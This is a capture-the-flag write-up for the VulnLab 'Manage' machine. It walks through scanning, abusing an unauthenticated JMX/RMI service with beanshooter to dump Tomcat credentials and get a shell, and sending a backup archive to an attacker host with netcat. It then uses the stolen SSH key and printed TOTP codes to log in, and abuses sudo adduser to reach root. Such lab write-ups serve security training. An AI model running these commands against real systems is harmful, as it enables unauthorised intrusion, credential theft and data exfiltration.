VulnLab Manage
VulnLab Manage
VulnLab Manage
Manage
Recon
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
└─$ rustscan -a 10.10.82.208 -r 1-65535
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
TCP handshake? More like a friendly high-five!
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 65435'.
Open 10.10.82.208:22
Open 10.10.82.208:2222
Open 10.10.82.208:8080
Open 10.10.82.208:42073
Open 10.10.82.208:39741
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-14 21:15 +05
Initiating Ping Scan at 21:15
Scanning 10.10.82.208 [4 ports]
Completed Ping Scan at 21:15, 0.13s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:15
Completed Parallel DNS resolution of 1 host. at 21:15, 0.07s elapsed
DNS resolution of 1 IPs took 0.07s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 21:15
Scanning 10.10.82.208 [5 ports]
Discovered open port 8080/tcp on 10.10.82.208
Discovered open port 22/tcp on 10.10.82.208
Discovered open port 42073/tcp on 10.10.82.208
Discovered open port 39741/tcp on 10.10.82.208
Discovered open port 2222/tcp on 10.10.82.208
Completed SYN Stealth Scan at 21:15, 0.11s elapsed (5 total ports)
Nmap scan report for 10.10.82.208
Host is up, received reset ttl 63 (0.090s latency).
Scanned at 2024-12-14 21:15:30 +05 for 0s
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
2222/tcp open EtherNetIP-1 syn-ack ttl 63
8080/tcp open http-proxy syn-ack ttl 63
39741/tcp open unknown syn-ack ttl 63
42073/tcp open unknown syn-ack ttl 63
Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds
Raw packets sent: 9 (372B) | Rcvd: 6 (260B)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
└─$ nmap -sC -sV -p22,2222,8080,39741,42073 10.10.82.208
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-14 21:16 +05
Nmap scan report for 10.10.82.208
Host is up (0.096s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 a9:36:3d:1d:43:62:bd:b3:88:5e:37:b1:fa:bb:87:64 (ECDSA)
|_ 256 da:3b:11:08:81:43:2f:4c:25:42:ae:9b:7f:8c:57:98 (ED25519)
2222/tcp open java-rmi Java RMI
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
| rmi-dumpregistry:
| jmxrmi
| javax.management.remote.rmi.RMIServerImpl_Stub
| @127.0.1.1:42073
| extends
| java.rmi.server.RemoteStub
| extends
|_ java.rmi.server.RemoteObject
8080/tcp open http Apache Tomcat 10.1.19
|_http-title: Apache Tomcat/10.1.19
|_http-favicon: Apache Tomcat
39741/tcp open tcpwrapped
42073/tcp open java-rmi Java RMI
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.48 seconds
We find Apache Tomcat 10.1.19 running on port 8080, yet nothing interesting
User
The most interesting port is 2222, which seems to be running Java RMI. Material to read to understand RMI and JMX:
To enumerate the port, we will use beanshooter
1
2
3
4
5
6
7
8
9
10
11
12
13
└─$ java -jar beanshooter-4.1.0-jar-with-dependencies.jar -h
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
usage: beanshooter [-h] ...
beanshooter v4.1.0 - a JMX enumeration and attacking tool
positional arguments:
attr set or get MBean attributes
brute bruteforce JMX credentials
deploy deploys the specified MBean on the JMX server
enum enumerate the JMX service for common vulnerabilities
<SNIP>
Let’s enumerate
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
└─$ java -jar beanshooter-4.1.0-jar-with-dependencies.jar enum 10.10.82.208 2222
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
[+] Checking available bound names:
[+]
[+] * jmxrmi (JMX endpoint: 127.0.1.1:42073)
[+]
[+] Checking for unauthorized access:
[+]
[+] - Remote MBean server does not require authentication.
[+] Vulnerability Status: Vulnerable
[+]
[+] Checking pre-auth deserialization behavior:
[+]
[+] - Remote MBeanServer rejected the payload class.
[+] Vulnerability Status: Non Vulnerable
[+]
[+] Checking available MBeans:
[+]
[+] - 171 MBeans are currently registred on the MBean server.
[+] Listing 149 non default MBeans:
<SNIP>
[+]
[+] Enumerating tomcat users:
[+]
[+] - Listing 2 tomcat users:
[+]
[+] ----------------------------------------
[+] Username: manager
[+] Password: <REDACTED>
[+] Roles:
[+] Users:type=Role,rolename="manage-gui",database=UserDatabase
[+]
[+] ----------------------------------------
[+] Username: admin
[+] Password: <REDACTED>
[+] Roles:
[+] Users:type=Role,rolename="role1",database=UserDatabase
We were able to retrieve admin and manager credentials. We can try invoking shell using the same tool
1
2
3
4
5
6
7
8
9
10
11
12
13
└─$ java -jar beanshooter-4.1.0-jar-with-dependencies.jar standard 10.10.82.208 2222 tonka
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
[+] Creating a TemplateImpl payload object to abuse StandardMBean
[+]
[+] Deplyoing MBean: StandardMBean
[+] MBean with object name de.qtc.beanshooter:standard=22016402736778 was successfully deployed.
[+]
[+] Caught NullPointerException while invoking the newTransformer action.
[+] This is expected bahavior and the attack most likely worked :)
[+]
[+] Removing MBean with ObjectName de.qtc.beanshooter:standard=22016402736778 from the MBeanServer.
[+] MBean was successfully removed.
1
2
3
4
5
└─$ java -jar beanshooter-4.1.0-jar-with-dependencies.jar tonka shell 10.10.82.208 2222
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
[tomcat@10.10.82.208 /]$ whoami
tomcat
[tomcat@10.10.82.208 /]$
Now we need to move laterally. There 2 users in home directory, useradmin and karl. We tried using passwords we found during enumeration of JMX on karl, but no success. Yet, trying admin password on useradmin showed Verification Code message
1
2
3
4
tomcat@manage:/$ su useradmin
su useradmin
Password: <SNIP>
Verification code:
We find .google_authenticator (can’t read) and backups folder
1
2
3
4
5
6
7
8
9
10
11
12
13
tomcat@manage:/home/useradmin$ ls -lha
ls -lha
total 36K
drwxr-xr-x 5 useradmin useradmin 4.0K Dec 14 17:06 .
drwxr-xr-x 4 root root 4.0K Jun 21 15:46 ..
drwxrwxr-x 2 useradmin useradmin 4.0K Jun 21 16:51 backups
lrwxrwxrwx 1 useradmin useradmin 9 Jun 21 15:48 .bash_history -> /dev/null
-rw-r--r-- 1 useradmin useradmin 220 Jun 21 15:46 .bash_logout
-rw-r--r-- 1 useradmin useradmin 3.7K Jun 21 15:46 .bashrc
drwx------ 2 useradmin useradmin 4.0K Jun 21 16:48 .cache
-r-------- 1 useradmin useradmin 200 Dec 14 17:06 .google_authenticator
-rw-r--r-- 1 useradmin useradmin 807 Jun 21 15:46 .profile
drwxrwxr-x 2 useradmin useradmin 4.0K Jun 21 15:53 .ssh
Inside backups we find archive, let’s transfer it
1
2
3
4
5
6
7
8
tomcat@manage:/home/useradmin/backups$ ls -lha
ls -lha
total 12K
drwxrwxr-x 2 useradmin useradmin 4.0K Jun 21 16:51 .
drwxr-xr-x 5 useradmin useradmin 4.0K Dec 14 17:06 ..
-rw-rw-r-- 1 useradmin useradmin 3.1K Jun 21 16:50 backup.tar.gz
tomcat@manage:/home/useradmin/backups$ nc 10.8.4.147 6666 < backup.tar.gz
nc 10.8.4.147 6666 < backup.tar.gz
Inside we find .google_authentificator and .ssh with ssh keys
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
└─$ cat .google_authenticator
CLSSSMHYGLENX5HAIFBQ6L35UM
" RATE_LIMIT 3 30 1718988529
" WINDOW_SIZE 3
" DISALLOW_REUSE 57299617
" TOTP_AUTH
99852083
20312647
73235136
92971994
86175591
98991823
54032641
69267218
76839253
56800775
1
2
3
4
5
6
7
└─$ ls -lha .ssh
total 20K
drwxrwxr-x 2 kali kali 4.0K Jun 21 20:53 .
drwxr-xr-x 5 kali kali 4.0K Jun 21 21:48 ..
-rw------- 1 kali kali 98 Jun 21 20:56 authorized_keys
-rw------- 1 kali kali 411 Jun 21 20:53 id_ed25519
-rw-r--r-- 1 kali kali 98 Jun 21 20:53 id_ed25519.pub
When we try using the key to connect via ssh, it prompts for verification code, thus entering one from the .google_authenticator gives us access
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
└─$ ssh -i .ssh/id_ed25519 useradmin@10.10.82.208
The authenticity of host '10.10.82.208 (10.10.82.208)' can't be established.
ED25519 key fingerprint is SHA256:mTJofQVp4T/1uO1CFsfPt8SADZfjbzIIynR0Zeqi0qo.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.82.208' (ED25519) to the list of known hosts.
(useradmin@10.10.82.208) Verification code:
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-112-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
System information as of Sat Dec 14 05:15:31 PM UTC 2024
System load: 0.0 Processes: 110
Usage of /: 74.8% of 6.06GB Users logged in: 0
Memory usage: 41% IPv4 address for ens5: 10.10.82.208
Swap usage: 0%
* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
just raised the bar for easy, resilient and secure K8s cluster deployment.
https://ubuntu.com/engage/secure-kubernetes-at-the-edge
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Fri Jun 21 16:48:53 2024 from 192.168.94.139
useradmin@manage:~$
Root
useradmin has sudo rights for adduser. But there’s regex for alphanumeric characters, so entering --system,--ingroup won’t work.
1
2
3
4
5
6
7
useradmin@manage:~$ sudo -l
Matching Defaults entries for useradmin on manage:
env_reset, timestamp_timeout=1440, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User useradmin may run the following commands on manage:
(ALL : ALL) NOPASSWD: /usr/sbin/adduser ^[a-zA-Z0-9]+$
According to hint for root, we have to check the default ubuntu sudoers file
1
2
3
4
<SNIP>
# Members of the admin group may gain root privileges
%admin ALL=(ALL) ALL
<SNIP>
There’s no admin user, so we can add one and get root privileges and pwn the box
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
useradmin@manage:~$ sudo /usr/sbin/adduser admin
Adding user `admin' ...
Adding new group `admin' (1003) ...
Adding new user `admin' (1003) with group `admin' ...
Creating home directory `/home/admin' ...
Copying files from `/etc/skel' ...
New password:
Retype new password:
passwd: password updated successfully
Changing the user information for admin
Enter the new value, or press ENTER for the default
Full Name []:
Room Number []:
Work Phone []:
Home Phone []:
Other []:
Is the information correct? [Y/n] y
useradmin@manage:~$ su admin
Password:
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
admin@manage:/home/useradmin$ sudo su
[sudo] password for admin:
root@manage:/home/useradmin#
This post is licensed under CC BY 4.0 by the author.